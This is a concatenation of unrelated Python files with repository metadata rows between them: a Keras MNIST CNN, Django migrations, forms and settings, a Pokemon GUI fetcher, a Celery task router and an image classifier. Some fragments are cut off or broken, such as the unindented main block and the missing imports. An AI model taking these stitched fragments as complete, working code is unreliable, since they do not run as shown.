class CNN(object):
    """Small LeNet-style convolutional classifier with a 10-way softmax head."""

    def constructLayers(self,
                        in_num_channel,
                        in_filter_size,
                        in_image_size,
                        in_max_pooling_size):
        """Build the Conv/Pool stack and store it on self.model."""
        self.num_channel = in_num_channel
        self.filter_size = in_filter_size
        self.image_size = in_image_size
        self.max_pooling_size = in_max_pooling_size

        kernel = (self.filter_size, self.filter_size)
        pool = (self.max_pooling_size, self.max_pooling_size)

        model = models.Sequential()
        model.add(layers.Conv2D(
            32, kernel, activation='relu',
            input_shape=(self.image_size, self.image_size, self.num_channel)))
        model.add(layers.MaxPooling2D(pool))
        model.add(layers.Conv2D(64, kernel, activation='relu'))
        model.add(layers.MaxPooling2D(pool))
        model.add(layers.Conv2D(64, kernel, activation='relu'))
        model.add(layers.Flatten())
        model.add(layers.Dense(64, activation='relu'))
        model.add(layers.Dense(10, activation='softmax'))
        model.summary()
        self.model = model
class Train(object):
    """Glue object: builds the CNN, loads MNIST, and runs training."""

    def __init__(self,
                 in_num_channel,
                 in_filter_size,
                 in_image_size,
                 in_max_pooling_size):
        self.cnn = CNN()
        self.cnn.constructLayers(in_num_channel=in_num_channel,
                                 in_filter_size=in_filter_size,
                                 in_image_size=in_image_size,
                                 in_max_pooling_size=in_max_pooling_size)
        self.mnist_loader = MnistLoader(in_image_size, in_image_size, in_num_channel)
        # Fix: build the dataset path portably. The original hard-coded
        # 'data\MNIST', whose backslash separator only resolves on Windows.
        self.mnist_loader.parserMnistData(os.path.join('data', 'MNIST'))

    # Use keras.callbacks.ModelCheckpoint to save the model while training.
    def train(self):
        """Train for 5 epochs with periodic checkpoints, then evaluate."""
        check_path = './ckpt/cp-{epoch:04d}.ckpt'
        save_model_callback = tf.keras.callbacks.ModelCheckpoint(
            check_path,
            save_weights_only=False,
            verbose=1,
            period=5)
        self.cnn.model.compile(optimizer='adam',
                               loss='sparse_categorical_crossentropy',
                               metrics=['accuracy'])
        self.cnn.model.fit(self.mnist_loader.train_images,
                           self.mnist_loader.train_labels,
                           epochs=5, callbacks=[save_model_callback])
        test_loss, test_acc = self.cnn.model.evaluate(
            self.mnist_loader.test_images, self.mnist_loader.test_labels)
        print("Accuracy is: {0}, and total amount of test images is: {1}".format(
            test_acc, len(self.mnist_loader.test_labels)))
if __name__ == "__main__":
train_obj = Train(1, 3, 28, 2)
train_obj.train() | [
"842175664@qq.com"
] | 842175664@qq.com |
d04df9b36f61e6f8358dcb1cc495cd63b9bc46af | 8ec2e012ccfbd15c5799bacbac6040c7df8b7c3f | /store/migrations/0004_auto_20200215_0900.py | 0f411dabe96bda5c25f76257bac7752593a310ea | [] | no_license | Rakshitmahajan/FairPrice | d5340fe19613ed235eb741e20d2b8c0139f08580 | 43f925d8a85b7158842b05a48c6bc342e2514c59 | refs/heads/master | 2023-01-07T16:59:50.833687 | 2020-03-17T13:48:28 | 2020-03-17T13:48:28 | 247,981,562 | 0 | 0 | null | 2023-01-05T10:19:02 | 2020-03-17T13:48:45 | Python | UTF-8 | Python | false | false | 1,100 | py | # Generated by Django 2.2.9 on 2020-02-15 09:00
from django.db import migrations, models
class Migration(migrations.Migration):
    """Relax several Item fields so they accept blank/null values."""

    dependencies = [
        ('store', '0003_auto_20200215_0857'),
    ]

    operations = [
        migrations.AlterField(
            model_name='item',
            name='company',
            field=models.CharField(blank=True, max_length=100, null=True),
        ),
        migrations.AlterField(
            model_name='item',
            name='description',
            field=models.CharField(blank=True, max_length=1000, null=True),
        ),
        migrations.AlterField(
            model_name='item',
            name='img_url',
            field=models.CharField(blank=True, max_length=1000, null=True),
        ),
        migrations.AlterField(
            model_name='item',
            name='model',
            field=models.CharField(blank=True, max_length=100, null=True),
        ),
        migrations.AlterField(
            model_name='item',
            name='price',
            field=models.IntegerField(blank=True, null=True),
        ),
    ]
"rakshitmahajan.rm@gmail.com"
] | rakshitmahajan.rm@gmail.com |
9cda5a3e8de3d78fd55239a46b1e147370b3b614 | c131f16aa7674db271ee2cab4326600af26da15c | /pokerFetcher/PokeFetcher.py | aff571a5fa087655919097c7aed44d462444045e | [] | no_license | bahmanshams/pokemon_fetcher | 8de54f15328f6327f10182a6a78c74f178c1a6b9 | 739e29f3cc36ac573affa11690d5099d50046836 | refs/heads/master | 2020-03-11T14:06:48.666008 | 2018-04-18T10:11:46 | 2018-04-18T10:11:46 | 130,044,336 | 1 | 0 | null | 2018-04-18T10:15:32 | 2018-04-18T10:15:32 | null | UTF-8 | Python | false | false | 1,462 | py | from guizero import App, TextBox, PushButton, Picture,error ,Text
from pokebase import pokemon
from requests import get
from PIL import Image
from io import BytesIO
info=''
def fetch_pokemon():
    """Look up the pokemon typed in the input box and populate the UI.

    Downloads the front sprite, saves it as poke.gif, and fills the
    info/height/weight/type boxes. Shows an error dialog on any lookup
    failure (unknown name, network error, missing sprite, ...).
    """
    name = (input_box.value).lower()
    try:
        poke = pokemon(name)
        info = poke.sprites
        height = poke.height
        weight = poke.weight
        typee = poke.type
        pic = get(poke.sprites.front_default).content
        image = Image.open(BytesIO(pic))
        image.save('poke.gif')
        icon.value = 'poke.gif'
        info_box.value = info
        height_box.value = height
        weight_box.value = weight
        type_box.value = typee
    except Exception:
        # Was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt; Exception keeps the dialog for real failures.
        error('warning', 'Invalid name, please enter the name properly')
# Build the window and its widgets.
app = App(title='Pokemon Fetcher', width=400, height=400, bg='#FFC300')
input_box = TextBox(app, text='Name')
icon = Picture(app, image="poke.gif")

submit = PushButton(app, command=fetch_pokemon, text='Submit')
submit.bg = "#FF5733"

info_box = TextBox(app, text='', multiline=True, width=30, height=5)
weight_lbl = Text(app, text="weight", bg='#FFC300')
weight_box = TextBox(app, text='')
height_lbl = Text(app, text="height", bg='#FFC300')
height_box = TextBox(app, text='')
type_lbl = Text(app, text="type", bg='#FFC300')
type_box = TextBox(app, text='', multiline=True)

# Enter the GUI main loop (blocks until the window closes).
app.display()

# Other attributes available on a pokebase pokemon object:
# poke.abilities, poke.height, poke.name, poke.species,
# poke.stats, poke.type, poke.weight
| [
"sereno.project@gmail.com"
] | sereno.project@gmail.com |
86ff4bd7ce0fdafce7c4ee2da25bef83424cf597 | 2e2d813757928abeaf667e0c7b127f9b1d9bd096 | /Shutter/ShutterWeb/forms.py | 13f0afe0393a0ab9edaa747753d896308cb5bbcd | [] | no_license | lnming/PhotoShow | 977e05534b61d438d18d75ad7feb4fe38696047a | 361ede28e3c58238391db0bbacf99a6d8f75d406 | refs/heads/master | 2021-09-19T09:11:30.860909 | 2018-07-26T07:00:15 | 2018-07-26T07:00:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,272 | py | from django import forms
from .models import *
from django.contrib.auth.forms import UserCreationForm
class CommentForm(forms.ModelForm):
    """Form for posting a comment on a topic."""

    class Meta:
        model = Topiccomment
        fields = ['content']
class TopicForm(forms.ModelForm):
    """Form for creating a topic with a title and body."""

    class Meta:
        model = Topic
        fields = ['title', 'content']
# register related
class RegisterForm(UserCreationForm):
    """Sign-up form exposing username and email on the custom user model."""

    class Meta(UserCreationForm.Meta):
        model = UserProfile
        fields = ("username", "email")
class photoForm(forms.ModelForm):
    """Photo upload form; the image file itself is optional."""

    image = forms.ImageField(required=False)

    class Meta:
        model = Photo
        fields = ['category', 'photo_name', 'photographer_name',
                  'photographer_remark', 'image']
class photocommentForm(forms.ModelForm):
    """Form for commenting on a photo."""

    class Meta:
        model = PhotoComment
        fields = ['content']
class messageSendForm(forms.ModelForm):
    """Form for sending a private message."""

    class Meta:
        model = Message
        fields = ['content']
class UserInfoForm(forms.ModelForm):
    """Profile-editing form for basic user details."""

    class Meta:
        model = UserProfile
        fields = ['username', 'gender', 'address', 'email']
class NewsCommentForm(forms.ModelForm):
    """Form for commenting on a news item."""

    class Meta:
        model = NewsComment
        fields = ['content', 'author']
"dshe6519@uni.sydney.edu.au"
] | dshe6519@uni.sydney.edu.au |
56be7e66f1221a5f47d8381ede18175161375cec | 6887d8ccc93ce6706633766b35d980a27816c25b | /pustakalaywebsite/settings/base.py | a61acce18ad98887dcbdf252f36618d2385f31de | [] | no_license | pustakalay/pustakalaywebsite | cba8f99b693bc517dc1dd60ba595e703b88946de | d89a76fafc8cde5be7de139a54c4a729d4849cc9 | refs/heads/master | 2022-12-09T23:16:31.947949 | 2019-05-12T14:12:12 | 2019-05-12T14:12:12 | 172,263,237 | 0 | 0 | null | 2022-12-08T04:59:45 | 2019-02-23T20:57:22 | Python | UTF-8 | Python | false | false | 3,614 | py | """
Django settings for pustakalaywebsite project.
Generated by 'django-admin startproject' using Django 1.11.20.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# When True, SMS sends are simulated instead of hitting a real gateway.
IS_SMS_SIMULATED = True

# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'booksapp',
    'addresses',
    'analytics',
    'search',
    'carts',
    'orders',
    'accounts',
    'billing',
    'sms',
]

# Custom user model lives in the accounts app.
AUTH_USER_MODEL = 'accounts.User'
FORCE_SESSION_TO_ONE = False
FORCE_INACTIVE_USER_ENDSESSION = False

# Outgoing mail via Gmail SMTP (TLS on port 587).
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = 'dev.pustakalay@gmail.com'
EMAIL_PORT = 587
EMAIL_USE_TLS = True
DEFAULT_FROM_EMAIL = 'Pustakalay Developer <dev.pustakalay@gmail.com>'

MANAGERS = (
    ('Pustakalay Developer', "dev.pustakalay@gmail.com"),
)
ADMINS = MANAGERS

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'pustakalaywebsite.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'pustakalaywebsite.wsgi.application'

# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATICFILES_DIRS = [
    os.path.join(BASE_DIR, "static_my_proj"),
]

MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'

# Auth redirect targets (named URL patterns).
LOGIN_URL = 'login'
LOGIN_REDIRECT_URL = 'home'
LOGOUT_REDIRECT_URL = 'home'
"tanayparadkar@gmail.com"
] | tanayparadkar@gmail.com |
1b467a91e2a1c3615151e4396aca2174f89d16e1 | c9755bfa9b8270f9e179ca09c78ceca4d09673f8 | /manage.py | 06a5f98043ce9e2850f69551eb8725b8924e5f8e | [] | no_license | kenners5/my_first_app | 5d0bd9a8545c17cf82748bcb72d3f7995982181d | 606c94d09e18e4b767465448388902e5f86c4b41 | refs/heads/master | 2021-01-25T12:01:38.399809 | 2013-10-05T18:36:00 | 2013-10-05T18:36:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "django_site.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"kenners@gmail.com"
] | kenners@gmail.com |
373fc37ec392129ca342d634dee0ed7f075aff4c | d3f92b32093159ddb62822b0da166c06983846d1 | /Downloads/PycharmProjects/untitled/py/py01.py | 107c45f8b24c17c80d3126827708d7d6f7a19b79 | [] | no_license | zyall/demo | 73f4ad7f09e286df8d22b74e0d6c35ffd1884c5c | 053df3fb20040021e3da5254e148a66abf204f56 | refs/heads/temp | 2021-06-14T13:00:01.766615 | 2019-07-19T03:11:36 | 2019-07-19T03:11:36 | 197,181,715 | 0 | 0 | null | 2021-06-02T00:01:08 | 2019-07-16T11:33:18 | Python | UTF-8 | Python | false | false | 925 | py | import random,sys
name=input("输入姓名:")
n = 0
#用户输入姓名后生成1到100的随机数
target=random.randint(1,99)
print('I am thinking of a number between 1 and 100')
print(target)
#用户一共有5次猜测机会,5次没猜中游戏结束
while n < 5:
n+=1
while True:
# 按q或Q退出游戏
user_input =input("Take a guess or enter \"q\" to quit.\n")
if user_input=='q' or user_input=='Q':
sys.exit('Goodbye')
# 实现输入validation,用户输入非数字的话要求重新输入
if user_input.isdigit():
user_input=int(user_input)
break
else:
print("Invaild input")
if user_input > target:
print('your guess is too high')
elif user_input < target:
print('your guess is too low')
else:
print('Good job, the correct number is %s' %target)
sys.exit(0)
| [
"1554754887@qq.com"
] | 1554754887@qq.com |
96fd2bd857643c663092d384cf8ec78d6b61a6cf | fb0f6646b2a7972454453907fbdc656b7471f55f | /p322_module_os.py | dd9437674eb42016e5d93c9c80fd0ac56ab764e7 | [] | no_license | woojin97318/python_basic | 6497d5c85369746edfe8ca79ad7f3f47c871ee66 | 97e9a322a08f1483bf35dc03507ac36af2bf1ddb | refs/heads/master | 2023-07-15T03:06:05.716623 | 2021-08-25T03:46:48 | 2021-08-25T03:46:48 | 399,681,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | # 모듈을 읽어 들입니다.
# Pull in the os module.
import os

# Print a few pieces of basic environment information.
print("현재 운영체제:", os.name)
print("현재 폴더:", os.getcwd())
print("현재 폴더 내부의 요소:", os.listdir())

# Create a directory and remove it (rmdir only works on empty directories).
os.mkdir("hello")
os.rmdir("hello")

# Create a file, then rename it.
with open("original.txt", "w") as file:
    file.write("hello")
os.rename("original.txt", "new.txt")

# Delete the file.
os.remove("new.txt")
# os.unlink("new.txt")

# Run a system command (Windows 'dir' listing).
os.system("dir")
"woojin97318@naver.com"
] | woojin97318@naver.com |
44b780296f882a1446213f64764a325db1448200 | 850001831b1fcdd4d27e328b356fc34909ca2917 | /examples/spawn.py | 367e288dfa2b65a8b6bb4a47c0514b8b5cd14e4f | [
"BSD-3-Clause"
] | permissive | yidiq7/pathos | b337353ccfe447866c46a4a784a7908c2f3fe31e | 7e4fef911dc0283e245189df4683eea65bfd90f0 | refs/heads/master | 2022-08-24T08:43:34.009115 | 2020-05-27T12:18:21 | 2020-05-27T12:18:21 | 267,310,390 | 0 | 0 | NOASSERTION | 2020-05-27T12:14:50 | 2020-05-27T12:14:47 | null | UTF-8 | Python | false | false | 957 | py | #!/usr/bin/env python
#
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 1997-2016 California Institute of Technology.
# Copyright (c) 2016-2020 The Uncertainty Quantification Foundation.
# License: 3-clause BSD. The full license text is available at:
# - https://github.com/uqfoundation/pathos/blob/master/LICENSE
"""
demonstrate pathos's spawn2 function
"""
from __future__ import print_function
from pathos.util import spawn2, _b, _str
if __name__ == '__main__':
    import os

    def onParent(pid, fromchild, tochild):
        # Parent side: read the child's greeting, reply, then reap the child.
        greeting = _str(fromchild.readline())
        print(greeting, end='')
        tochild.write(_b('hello son\n'))
        tochild.flush()
        os.wait()

    def onChild(pid, fromparent, toparent):
        # Child side: greet first, echo the parent's reply, then exit hard.
        toparent.write(_b('hello dad\n'))
        toparent.flush()
        reply = _str(fromparent.readline())
        print(reply, end='')
        os._exit(0)

    spawn2(onParent, onChild)
| [
"mmckerns@8bfda07e-5b16-0410-ab1d-fd04ec2748df"
] | mmckerns@8bfda07e-5b16-0410-ab1d-fd04ec2748df |
6da151561ebdbcbd2e1ef59f98ad58c5ba0e4fdd | 9b1da04d8c66b8fb429120c902e4022506a05f5a | /apc_pcl/pysrc/apc_tools/__init__.py | a4d7113fa1bb4ff799cd3927888c039cacc468a9 | [] | no_license | ehuang3/apc_ros | 49533b7c6ec9a13d45914b0c252c88c7413731a7 | 050871ec3e85c53fe1b0e4612abbbfa07db75f59 | refs/heads/master | 2021-01-10T12:30:49.700225 | 2015-05-27T03:41:20 | 2015-05-27T03:41:20 | 36,998,288 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | from .bin_segmenter import Bin_Segmenter
from .utils import *
from .misc import load_background | [
"jpanikulam@ufl.edu"
] | jpanikulam@ufl.edu |
6b0026679abeb367ca7956559f7f3c433bc6bf99 | 307d035478f602f7c780a39d65b05ce39688d61b | /trash/viz.py | e85f2e37302c261adff6c36e8b614472bd3ad8c4 | [
"MIT"
] | permissive | collectif-CAKUVA/dash-bodacc | c10c366586e0145c78a38d3880a54e849099c516 | a77c240003db2737f95bd9b6f58b8436e25724c5 | refs/heads/main | 2023-05-04T14:20:40.205142 | 2021-05-23T23:38:17 | 2021-05-23T23:38:17 | 343,438,545 | 1 | 2 | MIT | 2021-05-23T23:38:18 | 2021-03-01T14:09:18 | HTML | UTF-8 | Python | false | false | 868 | py | """
visulasation module
importing data to DF then exporting data to .html and csv.files
"""
import pandas as pd
from __main__ import s_numero_identification, s_numeroDepartement, s_date_parution, \
s_activite_insee
from api import s_ape
from funct_pool import s_activite_declaree, s_code_postal
df_final = pd.DataFrame({
'siren': s_numero_identification,
'departement': s_numeroDepartement,
'date_publication': s_date_parution,
'activite_déclarée': s_activite_declaree,
'code_ape': s_ape,
'activte_insee': s_activite_insee,
'code_postal': s_code_postal
})
df_ml = pd.DataFrame({
'activite': s_activite_declaree,
'code_ape': s_ape
})
with pd.option_context('display.max_rows', None, 'display.max_columns', None):
df_final.to_html('temp.html')
df_final.to_csv('data.csv', header = True, encoding= 'utf-8') | [
"t.valton@gmail.com"
] | t.valton@gmail.com |
daa82ba337e7c7ea48f602e231247e8415e0c3dc | 805fbd9aead4fc2998fd5d8790043a20b2656915 | /data_format/__init__.py | cb3c33b9d09bcf03a38af8f8bdd84bd066689fa1 | [] | no_license | chenhaomingbob/ToolBox | f9a6ef64352c85ae84c44e9fab53aab74992c7c5 | 962304c004aa39e8a5bcb153def9dc3895595c9f | refs/heads/master | 2021-05-19T00:37:23.170766 | 2020-06-01T10:57:05 | 2020-06-01T10:57:05 | 251,496,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py | #!/usr/bin/python
# -*- coding:utf8 -*-
"""
Author: Haoming Chen
E-mail: chenhaomingbob@163.com
Time: 2020/03/23
Description:
""" | [
"chenhaomingbob@163.com"
] | chenhaomingbob@163.com |
9101fd59a62f04ff3e06d28da7e5ee90c839b959 | 9a123c2a3be7dbd2d5c60a4e5830b903b9b6e552 | /module_build_service/scheduler/route.py | c74c78c626070f3e1d87114f4ea7d177a11a4299 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | James6xie/fm-orchestrator | d3b24093d1c635142dc57262382fdae869cd82b1 | d3656b159b457126f99c323f49572809c7afc47d | refs/heads/master | 2023-02-19T04:35:25.791000 | 2020-11-30T19:25:13 | 2020-12-04T12:08:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,991 | py | # -*- coding: utf-8 -*-
# SPDX-License-Identifier: MIT
""" Define the router used to route Celery tasks to queues."""
from __future__ import absolute_import
import inspect
from module_build_service.common import conf, log, models
from module_build_service.scheduler.db_session import db_session
from module_build_service.scheduler.handlers.greenwave import get_corresponding_module_build
def route_task(name, args, kwargs, options, task=None, **kw):
    """
    Figure out the module build id from task args and route the task to a
    queue based on that id.

    Each celery worker listens on two queues:

    1. mbs-default
    2. mbs-{number}  # where number is "module_build_id % conf.num_workers"

    Tasks associated with a module build are routed to "mbs-{number}" so
    that all tasks for one build run serially on the same worker;
    everything else goes to "mbs-default".
    """
    queue_name = "mbs-default"
    module_build_id = None
    num_workers = conf.num_workers

    module, handler_name = name.rsplit(".", 1)
    handler = getattr(__import__(module, fromlist=[handler_name]), handler_name)
    # Handlers can be decorated; unwrap to inspect the original signature.
    while getattr(handler, "__wrapped__", None):
        handler = handler.__wrapped__
    # Fix: inspect.getargspec was deprecated and removed in Python 3.11;
    # getfullargspec exposes the same .args attribute.
    handler_args = inspect.getfullargspec(handler).args

    def _get_handler_arg(name):
        # Prefer the keyword value; fall back to the positional slot.
        index = handler_args.index(name)
        arg_value = kwargs.get(name, None)
        if arg_value is None and len(args) > index:
            arg_value = args[index]
        return arg_value

    if "module_build_id" in handler_args:
        module_build_id = _get_handler_arg("module_build_id")

    # if module_build_id is not found, we may be able to figure it out
    # by checking other arguments
    if module_build_id is None:
        if "task_id" in handler_args:
            task_id = _get_handler_arg("task_id")
            component_build = models.ComponentBuild.from_component_event(db_session, task_id)
            if component_build:
                module_build_id = component_build.module_build.id
        elif "tag_name" in handler_args:
            tag_name = _get_handler_arg("tag_name")
            module_build = models.ModuleBuild.get_by_tag(db_session, tag_name)
            if module_build:
                module_build_id = module_build.id
        elif "subject_identifier" in handler_args:
            module_build_nvr = _get_handler_arg("subject_identifier")
            module_build = get_corresponding_module_build(module_build_nvr)
            if module_build is not None:
                module_build_id = module_build.id

    if module_build_id is not None:
        queue_name = "mbs-{}".format(module_build_id % num_workers)

    taskinfo = {"name": name, "args": args, "kwargs": kwargs, "options": options, "kw": kw}
    log.debug("Routing task '{}' to queue '{}'. Task info:\n{}".format(name, queue_name, taskinfo))
    return {"queue": queue_name}
| [
"mprahl@redhat.com"
] | mprahl@redhat.com |
d3743b3de00d52481bf2c74a20fb31405afce4c4 | fb81442e5d2e940ad967bd0a264b7918d739173f | /py_test.py | 49e8b365b34d93965925230a57e83abad11d1008 | [] | no_license | Amertz08/euler_py | 054f45d110b8cf4d0e9afeb7f5c608026226443c | 0dd217c9e0a061e3622fd150b61e24a2c6bad5af | refs/heads/master | 2021-05-06T23:15:42.742578 | 2017-12-07T00:16:31 | 2017-12-07T00:16:31 | 112,960,695 | 0 | 1 | null | 2017-12-06T20:32:57 | 2017-12-03T20:21:48 | C | UTF-8 | Python | false | false | 515 | py | import euler_py as eul
def test_problem_one():
    answer = eul.problem_one(10)
    assert answer == 23, f'Problem 1 should be 23: {answer}'
def test_problem_two():
    answer = eul.problem_two(89)
    assert answer == 44, f'Problem 2 should be 44: {answer}'
def test_problem_three():
    answer = eul.problem_three(13195)
    assert answer == 29, f'Problem 3 should be 29: {answer}'
def test_problem_four():
    answer = eul.problem_four(2)
    assert answer == 9009, f'Problem 4 should be 9009: {answer}'
| [
"adammertz@gmail.com"
] | adammertz@gmail.com |
554e8005df3b5bf36200e2b33f236db5ab36f2ee | 530675a299158bb28d61c41920ea9799b4cdb304 | /source/image_classifier.py | 45f23b8d99e14ccacf1b0f79053f6988a3fb7d29 | [] | no_license | srikanthsrnvs/astrum | 60e54d519c526c7b63c0a593484ebace0cdb936d | d09e5af0266e832d902b6ece09536a7d089bf14d | refs/heads/master | 2022-07-07T11:02:38.386896 | 2020-05-03T18:14:46 | 2020-05-03T18:14:46 | 231,634,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,665 | py | import io
import os
import random
import re
import shutil
import zipfile
from pathlib import Path
import numpy as np
import requests
import tensorflow as tf
from PIL import Image
from tensorflow.python import keras
from tensorflow.python.keras.optimizers import *
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from custom_lenet import CustomLeNet
from firebase import FirebaseHelper
from job import Job
from saving_worker import SavingWorker
class ImageClassifier:
def __init__(self, job, log_dir, finished_queue, cv):
self.cv = cv
self.log_dir = log_dir
self.job = job
self.finished_queue = finished_queue
self.hyperparameters = {}
self.firebase_helper = FirebaseHelper()
self.job_files_path = Path(str(Path.home())+'/JobFiles/'+self.job.id)
def __save(self):
self.model.save(str(self.job_files_path)+'/model.h5')
with tf.keras.backend.get_session() as sess:
tf.saved_model.simple_save(
sess,
str(self.job_files_path)+'/ServingModel/1',
inputs={'input_image': self.model.input},
outputs={t.name: t for t in self.model.outputs}
)
self.finished_queue.append(
{'job': self.job, 'label_map': self.label_map, 'stats': self.stats})
self.cv.notifyAll()
shutil.rmtree('./'+self.job.filename)
def build(self):
self._prepare_data()
self._prepare_hyperparameters()
model = CustomLeNet(self.output_classes,
self.hyperparameters['optimizer'], self.hyperparameters['output_activation'], self.hyperparameters['loss']).model
train_datagen = ImageDataGenerator(
rescale=1. / 255,
width_shift_range=0.2,
height_shift_range=0.2,
horizontal_flip=True,
vertical_flip=True
)
test_datagen = ImageDataGenerator(
rescale=1. / 255,
width_shift_range=0.2,
height_shift_range=0.2,
horizontal_flip=True,
vertical_flip=True
)
train_generator = train_datagen.flow_from_directory(
self.job.filename+'/train',
target_size=(self.input_size[0], self.input_size[1]),
batch_size=self.train_batch_size
)
validation_generator = test_datagen.flow_from_directory(
self.job.filename+'/test',
target_size=(self.input_size[0], self.input_size[1]),
batch_size=self.test_batch_size
)
tensorboard_callback = keras.callbacks.TensorBoard(
log_dir=self.log_dir+'/scalars/')
stats = model.fit_generator(
train_generator,
steps_per_epoch=self.train_img_count // self.train_batch_size,
epochs=self.hyperparameters['epochs'],
validation_data=validation_generator,
validation_steps=self.test_img_count // self.test_batch_size,
callbacks=[tensorboard_callback]
)
stats = stats.history
train_loss = str(stats.get('loss', '')[-1])
test_loss = str(stats.get('val_loss', '')[-1])
train_acc = str(stats.get('acc', '')[-1])
test_acc = str(stats.get('val_acc', '')[-1])
self.stats = {
'train': {
'accuracy': train_acc,
'loss': train_loss
},
'test': {
'accuracy': test_acc,
'loss': test_loss
}
}
self.model = model
self.label_map = train_generator.class_indices
self.__save()
def _prepare_hyperparameters(self):
hyperparameters = {}
hyperparameters['epochs'] = 100
hyperparameters['learning_rate'] = 0.001
hyperparameters['loss'] = 'categorical_crossentropy'
hyperparameters['momentum'] = 0.9
hyperparameters['decay'] = 0.0
hyperparameters['optimizer'] = Adam(
lr=hyperparameters['learning_rate'])
hyperparameters['output_activation'] = 'softmax'
self.hyperparameters = hyperparameters
def _prepare_data(self):
total_img_count = 0
cumalative_img_height = 0
cumalative_img_width = 0
imgs = {}
r = requests.get(self.job.download_link)
f = io.BytesIO(r.content)
z = zipfile.ZipFile(f)
z.extractall()
filename = z.filelist[0].filename.strip('/')
self.job.set_filename(filename)
for folder in os.listdir(filename):
path = filename+'/'+folder
imgs[folder] = []
for img_name in os.listdir(path):
# TODO: Error handling if a file is not an image
img = Image.open(os.path.join(path, img_name))
imgs[folder].append({'image': img, 'name': img_name})
total_img_count += 1
img_height, img_width = img.size
cumalative_img_height += img_height
cumalative_img_width += img_width
# img_size = int(max(cumalative_img_height/total_img_count,
# cumalative_img_width/total_img_count))
# TODO: Image size is constant here, need to make dynamic
img_size = 299
# Save all images by splitting into /test & /train
train_img_count = 0
test_img_count = 0
for key, img_data in imgs.items():
os.makedirs(filename+'/train/'+key)
os.makedirs(filename+'/test/'+key)
# Reshape all images
dataset_size = len(img_data)
split = int(dataset_size * 0.7)
train_imgs = img_data[0:split]
test_imgs = img_data[split:]
for im in train_imgs:
train_img_count += 1
img = im['image'].resize((img_size, img_size))
img.save(filename+'/train/{}/{}'.format(key,
im['name']))
for im in test_imgs:
test_img_count += 1
img = im['image'].resize((img_size, img_size))
img.save(filename+'/test/{}/{}'.format(key,
im['name']))
# cleanup
shutil.rmtree(filename+'/'+key)
self.train_batch_size = min(16, train_img_count)
self.test_batch_size = min(16, test_img_count)
self.train_img_count = train_img_count
self.test_img_count = test_img_count
self.input_size = (img_size, img_size, 3)
self.output_classes = len(imgs.keys())
| [
"srikanth.srinivas@mail.utoronto.ca"
] | srikanth.srinivas@mail.utoronto.ca |
ad38dda9c96e041243e59ad235effe29e381f2a1 | 5a633b40ecc7a2178d38a9a660877445959e2a48 | /snmp.py | 12234fb3638ff0f101c3d42538b2de85224b36fd | [] | no_license | rkuma238/test_framework | 4a087efc398047afd466ac6b69afc0c23e9424aa | 93a2e696c69ca98faa549d7547f1482bba3d9b40 | refs/heads/master | 2021-09-14T22:57:49.348206 | 2018-05-21T16:29:16 | 2018-05-21T16:29:16 | 113,644,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | from pysnmp.hlapi import *
